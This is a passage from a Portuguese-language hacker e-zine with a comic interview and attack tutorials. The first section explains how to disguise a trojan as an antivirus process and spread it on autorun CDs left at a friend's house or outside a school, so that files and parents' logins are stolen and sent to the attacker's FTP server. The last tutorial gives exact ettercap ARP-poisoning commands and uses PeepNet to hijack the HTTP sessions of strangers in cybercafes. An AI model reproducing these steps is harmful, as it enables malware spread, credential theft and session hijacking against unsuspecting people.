Arquivo em lotes (F9) com o ícone do ashdisp.exe, depois de salva-lo com o ícone do ashdisp.exe estamos eliminando a possibilidade de indentificação por visualizadores de processos que exibem os ícones dos itens de inicialização, mas e se por acaso este mesmo identificador de processos (como process view por exemplo) além de exibir o icone exibir também as propriedades dos itens no startup? Eheheeh, vamos roubar também as propriedades do ashdisp. Roubando as propriedades do ashdisp.exe Link ae: http://www.hunterhacker.xpg.com.br/propriedades.txt Importe este script de propriedade para o camuflagem com o reshacker e cole na mini pasta correspondente as propriedades do aplicativo, depois clique em compile script para compilar estes scripts no camuflagem, prontinho, já temos o nosso clone, agora crie um CD em autorun com o seguinte nome na parte de cima do CD: A virgem da minha vizinha transando com minha prima parte 1 de 66. Esqueça este CD na casa de algum amigo seu que você tem o IP e todos os messes deixe uma continuação hauhauah!!! pronto, vá pra sua casa e se conecte no PC dele enquanto o tarado ver a suposta prima de alguém trepando com outra mulher (arrume um filme caseiro pra ficar mais convincente, eheh), assim enquanto ele olha o filme você está roubando os arquivo dele acessando algum servidor de FTP por telnet no PC dele e jogando (put) os arquivos dele pro seu servidor. Pense bem com relação a esssa historia de autorun: K2ps ------- > TJ de informação, manda tudinho pro POP bastando configurar previamente o SMTP. Esqueça um monte de CDs com joguinhos em frente a uma escola de pirralhos "cheios da grana", derrepente voce terá os logs dos pais deles hauhauhauh!!! Experiencia propria HUahuahuah!!!! Huhuhuhuhuhuhuh. Putz, só foi eu terminar de escrever o pessoal já chegou, até os hackas comemoram o natal uhauah!!! Falow mein freuds, até a proxima.... SHOTS: Procurem na porra do darkers ----- C4p1Tul0 13 //--//--//--//--//--//--// Zx|zZ //--//--//--//--//--//--// ||==============#|| Humor Hacker ||#==============#|| ||==============#|| RIPADO DA ZINE F3||#==============#|| //--//--//--//--//--//--// Zx|zZ //--//--//--//--//--//--// _xXXXP^'' ``^YXXXx_ _xXXXXP~ 14 - Entrevista - ~YXXXXx_ _xXXXXXX( Cheat Struck )XXXXXXx_ xXXXXXXXXXXbxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdXXXXXXXXXXx YXXXXXXXXXXP^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^YXXXXXXXXXXP ~YXXXXXX( )XXXXXXP~ ~YXXXXb_ Cheat Struck _dXXXXP~ ~YXXXbx.. ..xdXXXP~ Struck: Finalmente conseguimos contato com essa ilustre figura do hacking brasileiro: Cheat Struck. Ola. Struck: Alou. Struck: Como voce se sente? Struck: Meio nervoso. Nunca fui entrevistado antes. Struck: Entao para quebrar o nervosismo posso comecar com uma pergunta pessoal?? Struck: Hmmm.. ok Struck: Voce tem namorada?? Struck: nao. Struck: Como que pode um bunitao como voce nao ter namorada? Struck: Ora essa. Voce que eh lindo. Struck: Obrigado. Mas acho que nao eh isso que nossos leitores pretendem saber nesta entrevista. Struck: Espero que nao, afinal 99% dos leitores da f3 sao homens. Struck: Realmente. Struck: ... Struck: ... Struck: hm... Struck: ;) Struck: =* Struck: Diga algo que nossos leitores possam se interessar. Struck: Sei la. Que tal computadores?? Struck: Boa. Conte-nos como foi sua primeira relacao com um computador. Struck: Bem... cof! cof! Achu que isso eh meio pessoal. Struck: Voce ja gozou no teclado? Struck: Nao. Eu costumo usar a mao como escudo. Struck: Hm... interessante. Struck: Eh preciso ter reflexos rapidos. Struck: Voce tem algum super poder?? Struck: Eu posso fazer o monitor ficar preto apenas olhando para ele por alguns minutos. Struck: Puxa vida! Aposto que vc nunca precisou usar screem savers. Struck: Hmm... eh verdade. Talvez isso acontecao por causa dos screem savers. Nunca havia pensado nisso. Struck: Entao fora isso, o que voce sabe fazer?? Struck: Eu sei fazer ezines. Struck: O que eh isso? Struck: Eh um monte de textos que eu escrevo sobre coisas inuteis que nunca precisaremos usar na vida real. Struck: E as pessoas leem isso? Struck: Por incrivel que pareca. Struck: Fale-nos mais sobre estas ezines. Struck: Atualmente eu escrevo a fatal3rror. Ja escrevi a cszine, alem de materias para a DeathKnights, s13, entre outras. Struck: E te pagam para escrever estas materias? Struck: Nao. Struck: Entao pq voce as escreve? Struck: Porque eu sou troxa. Struck: Serio. Struck: Sei la! Falta do que fazer, hobbie, for fun,... Sei la. Struck: Qual seu objetivo com estes textos?? Struck: Primeiramente, aprender mais. Pq assim como no colegio, qdo voce faz um trabalho, pesquiza mais sobre o assunto e assim aprende mais. Struck: e os outros objetivos?? Struck: Ah sim!! Fama, gloria pessoal e status na sociedade. Struck: Como surgiu a ideia de escrever uma zine? Struck: A fatal3rror surgiu do nada. Uma noite eu comecei a juntar os textos q tinha comecado a fazer e nao acabei. Dei uma relida, conclui-os e juntei tudo num txt soh. Joguei na inet e as pessoas comecaram a ler... Struck: E qto a cszine?? Struck: Nakela epoca eu catava tudo qto era textos sobre h/p/c/s/v e escrevia sobre o que havia aprendido. No final da semana colocava na page para amigos que tb estavam comecando, lerem... Struck: E pq ela acabou?? Struck: Pq comecou a fazer sucesso. Ae rolava pressao pra zine sair a tempo, essas coisas. Nao curtia isso, entao cabei com a zine. Struck: Depois disso o que voce fez?? Struck: Entrei na dk. Struck: e... Struck: Foi isso. Struck: O que voce fazia na deathkinghts?? Struck: Eu escrevia para a zine deles, e qdo precisava, ajudava o grupo ou os membros a ownar algumas maquinas. Struck: E saiu pq?? Struck: Deu uns rolo com a bl0w. Eu conhecia o pessoal dos 2 lados entao pra nao sobrar pra mim, sai. Struck: Voce foi membro da bl0w?? Struck: Nop. Apenas frequentava o canal restrito aos membros, mas nunca fui convidado a ser membro. E se fosse, nao aceitaria, afinal na epoca eu era da dk. Struck: Voce faz defaces?? Struck: Ja fiz. Na epoca da dk. Struck: Quais eram os motivos? Struck: Diversos. Cada membro tinha seus proprios motivos. O grupo deixava bem claro que nao se responsabilizava pelo ato de seus membros. Struck: E quais eram os seus motivos?? Struck: Eu ia de gaiato. Ajudava os outros. Unica vez que fiz deface por motivos proprios, foi qdo o Cacaio tava com problemas com a policia. Ae eu e o encrypt fizemo um Mass Hack em mais de 100 paginas com o protesto. Struck: E vc ainda faz defaces?? Struck: Nao. Struck: Pq?? Struck: Nunca vi graca em alterar paginas sem proposito nenhum. Se um dia eu precisar ser ouvido eu talvez volte a fazer defaces. Mas provavelmente isso nao aconteca pq agora se precisar falar alguma coisa, tenho a f3 para isso. Struck: Depois que saiu da dk o que houve?? Struck: Foi +/- a epoca que comecei a beber feito um gamba. Talvez por isso nao lembre direito o que aconteceu nessa epoca. Struck: Porra! Voce recebeu convites de outros grupos! Struck: Ah eh!! Obrigado por lembrar. Embora eu nao tenha entrado em nenhum realmente. Struck: Ja sao 4:30 da madrugada no horario de verao. Acho que podemos acabar com essa entrevista nao eh?? Struck: Achu q ninguem se importaria se isso acontece-se. Struck: Sera que tem gente que leu essa reportagem ateh aki?? Struck: Provavelmente nao. Nem eu mesmo estou lendo o que escrevo pra nao ter desgosto. Struck: Entao ta. Obrigado por seu tempo. Struck: Meu tempo eh todo seu. Struck: Realmente... Struck: Se liga que amanha temos prova. Struck: Eh mesmo. Vou dormir. Boa noite. Struck: Falow!! ----- C4p1Tul0 14 [+ ======X============X===============X===== +] XxX CONFIGURANDO O ETTERCAP EM MODO SHELL ||=================#|| E |#=================|| HIJACKING DE HTTP + bY + 6_Bl4ck9_f0x6 [+ ======X============X===============X===== +] Ola pessoal, olha eu aqui outra vez, eu tenho que parar de escrever e começar aprender, mas num da, to meio viciado em escrever ehehehe, mas acredito que voces nao querem saber disso. Pois bem, agora vou demonstrar a principal tecnica utilizada por mim e que pode ser muito util algum dia para voces, o sequestro de seçao de HTTP, tambem vou falar do sequestro de telnet apenas como complemento (em um capilo futuro), na pratica nunca usei Hijacking de telnet contra alguem, primeiro porque em telnet num rola a cripto e existe uma possibilidade muito remota de uma empresa utilizar este serviço e segundo e porque usuario comuns (a escoria da sociedade) nao sabe nem o que e telnet Huahauh!!!. Vamos la, acredito que voce ja tao de saco cheio de ouvir teoria sobre Hijacking, minha intençao aqui nao e encher voces com mais teoria, vamos a uma receitinha de bolo, ou seja, vamos partir para a açao, porque ninguem vive de teoria. Voce precisará carregar na pendrive dois programas, o primeiro e o ettercap para redirecionar o trafego dos computadores caso voce nao esteje no gateway, o que pode ser muito provavel caso voce seguiu a vitima e ela esteje em uma lan house que seja de pessoas desconhecidas, voce nao vai chegar no dono da lan e dizer: - Ei, licença, eu poderia usar esse computador para capturar os pacotes daquele computador que aquela senhorita está usando? Huahuahauh!!!! -Isso é bem melhor para voce cara, vai por mim, pois se eu nao usar esse computador vou precisar recorrer ao arp poisoning e isso é um perigo muito grande porque pode acontecer o tal ACK Storm quando eu atacar, pois nao tenho tempo de usar syn flood. Hauhauhauahuahuahauh!!!! O cara vai franzir a testa e olhar pra voce com uma interrogaçao na cabeça, tipo os mangás e dizer: - Seja la o que for isso a reposta é Nao!!!! kkkkkkk Dae voce tem que pegar o trafego na marra, por isso voce precisa do ettercap, pois voce vai utilizar arp poisoning, coisa que ja ta todo mundo enjoado de ouvir falar. O segundo programa é o Spynet que pode ser encontrado no: http://www.elhacker.net/ ------ >>> O site que eu mais amo na vida, me ajudou muito no meu começo :- ) ou http://www.hunterhacker.xpg.com.br/21.rar O nome Spynet na verdade é apenas o nome do pacote, pois depois de sua instalaçao voce tera dois programas na maquina, que sao o CaptureNet que é um bom sniffer e o PeepNet, montador de cookies que usa os dados capturados pelo CaptureNet para sequestrar a seção, ou seja, ele remotando o cookie da galera. Vamos começar pelo ettercap. Vou demonstrar exemplos de linha de comando, porque GUI nao e bom para o seu aprendizado, por que se voce aprender a lidar com linha de comando no ettercap voce poderá aproveitar muito mais esta ferramenta, pois voce podera utilizalo usando o telnet para sniffar pacotes das estaçoes na rede do computador invadido, coisa que nao seria possivel de ser feita (pelo menos nao sem levantar suspeitas) usando algum programa de assistencia remota como o VNC, mas obvio que isso não é regra, pois voce pode injetar a dll do VNC no host sem levantar suspeitas exploitando uma falha no mesmo e começar a mecher nele graficamente, para isso utilize o metasploit. Mas vamos nos focalizar no ettercap via command line. Julgando que você tem que ser rapido no seu sequestro, pois a vitima pode apenas querer dar uma olhada no seu orkut e logo sair, vamos continuar este texto. Bem, ja que voce tem que ser rapido em utilizar as ferramentas, entao use uma variavel de ambiente logo de cara no executar para abrir o shell do ettercap, ao inves de chutar uma unidade master de um computador que voce nunca viu e evitar aquele pã do windows ehehe, ou seja, abra o shell dessa maneira: cmd /k cd %ProgramFiles%\EttercapNG\ Para ver as variaveis de ambientes digite o comando set sem parametros. Se a lan utilizar aqueles gerenciadores que bloqueiam o executar, abra qualquer diretorio e faça uma pesquisa no sistema pelo interpretador (cmd.exe) na pasta do sistema (\windows\system32\) porque pesquisas normalmente nao sao bloqueadas. Execute ele e faça o mesmo esquema usando variaveis de ambiente para entrar no diretorio do ettercap, mas tira o cmd /k porque se nao voce vai criar um subshell, mas num tem nada, so falei para você saber (dã, todo mundo sabe disso). No diretorio do ettercap digite a opçao -I maiusculo que significa interface, para ele exibir as interfaces de rede disponiveis, voce verá algo mais ou menos pareceido com isso: List of available Network Interfaces: //Lista de interfaces de rede disponiveis \Device\NPF_GenericDialupAdapter Adapter for generic dialup and VPN captu re \Device\NPF_{0C95D153-9A2E-4593-95EF-9DC9C299E0C6} VMware Virtual Ethernet Adapter \Device\NPF_{2C102038-8912-4C6D-B516-7BA2DD3B86DE} VMware Virtual Ethernet Adapter \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} VIA PCI 10/100Mb Fast Ethernet Adapter Selecione a interface de rede que condiz com o mesmo seguimento de rede que a vitima está. Para setar uma interface de rede utilize a opçao -i minusculo que tambem significa interface, tipo assim: ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} Essa é a minha interface eth0, dã (10/100Mb). Logo a seleçao da interface de rede vamos setar a interface de usuario, ou seja, como o usuario vai ver as coisas acontecendo, nada de GTK pessoal, vamos usar a interface de texto mesmo e vamos utilizar a opçao q minusculo que é usada para farejamento de trafego, com essa opçao apenas pegamos coisas importantes, como senhas, caso contrario voce ia ver muito lixo na tela. Ja a opçao -Q maiusculo nao nos mostra nada. Deixe assim: ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} -Tq Agora vamos dizer para o ettercap qual o tipo de redirecionamento que iremos utilizar, nesse caso utilizaremos o arp poisoning. Para setar o redirecionamento use a opçao -M que vem de Man In The Middle. Agora voce me pergunta: Mas temos que escrever Arp poisoning? A resposta e nao, basta digitar arp, devera ficar assim: ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} -Tq -M arp Agora vamos usar a opçao -o "only" que significa apenas, vamos utilizar o -o porque queremos apenas fazer o redirecionamento de trafego, porque quem vai fareja é o peepnet. Mas se quisermos pegar senhas do pessoal na rede nao colocamos o -o. O ettercap pega senhas de muuuuitos protocolos, pega senhas de negociaçoes SSL (banco) atraves de MITM, pega senhas de VNC, entre outros, tais como: RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG, TELNET, FTP, POP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, LDAP, NFS. Voce ainda pode fazer ataques mitm contra dados tunelados por PPTP, mas vamos fazer apenas o arp poisoning. Podemos especificar os computadores que queremos redirecionar o trafego, mas como a açao tem que ser rapida e voce nao tem tempo de dar um IPconfig para ver como está configurado o range de IPs para saber qual o IP da maquina que ela esta usando, utilize apenas a sintaxe de broadcast que e o //, com o // ele faz o que e correspondendo a um scan por interface grafica, ou seja, ele manda um broadcast arp, pega os MAC e envenena os caras. Apesar de voce poder fazer uma especificaçao de alvo, isso nao vem ao caso agora. Deverá ficar assim: ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} -Tq -M arp -o // A velocidade da açao é tudo. Nao vamos configurar o CaptureNet (por hora), apenas abra o CaptureNet e clique em start capture, depois que voce tiver capturando pacotes abra o peepnet, existe um botao na tela do programa escrito Go get it! A unica coisa que voce tera que fazer é selecinar a seçao que deseja capturar no lado esquerdo da tela clicar neste botao. Voce podera sequestrar seçoes de qualquer computador na LAN, o peepnet mostra até o cookie com o ID da seção, ou seja, tu poderas se logar novamente quando voce quiser, apenas se logando no cookie utilizando o opera por exemplo. http://www.hunterhacker.xpg.com.br/Untitled-1.jpg ----- C4p1Tul0 15 ========================================================================================================== THE END BY 6_Bl4ck9_f0x6 Se gostou da zine ou se gostou apenas de um artigo da zine, manda um email ae cara, pois se não tiver gente lendo me desmotiva bastante ficar escrevendo a zine, repito, se gostou da zine manda um mail ae b-fox@bol.com.br, se naum gostou também manda, se quer sugerir algo, quer mandar matérias, manda email ae for me que faço questão de publica-las. Gostaria de sua ajuda para a distribuição da C.O.D.E, pois a principal intenção dela é tentar transportar os tempos de ouro para a nossa época, espero ter conseguido com a ajuda da introdução da zine e do artigo Zines de ontem e de hoje, colocar em sua mente que fazer zines é legal, pois podemos nos expresar e ser ouvidos por outras pessoas que compartilham o mesmo gosto que nós, o hacking. Se quiser me xingar - Manda que publico Se quiser elogia - Manda que publico Se quiser perguntar - Manda que eu respondo, se eu nao souber, vou para o inferno atraz da informaçao para voces Se eu tiver vacilado no texto - Manda que eu corrijo o erro e publico sua mensagem Se quiserem mandar seus textos - Mandem que eu publico "se forem bons :-)" Se nao quiserem ser identificados eu nao posto o remetente Mas sempre usem um remailer galera, detesto ter que ficar camuflando email com * Mandem emails como se fossem o pato donald, super man e tals uhauhauhauh e mais legal =========================================================================================================== Abraçao Galera e ate a proxima ediçao da minha, da sua, da nossa C.O.D.E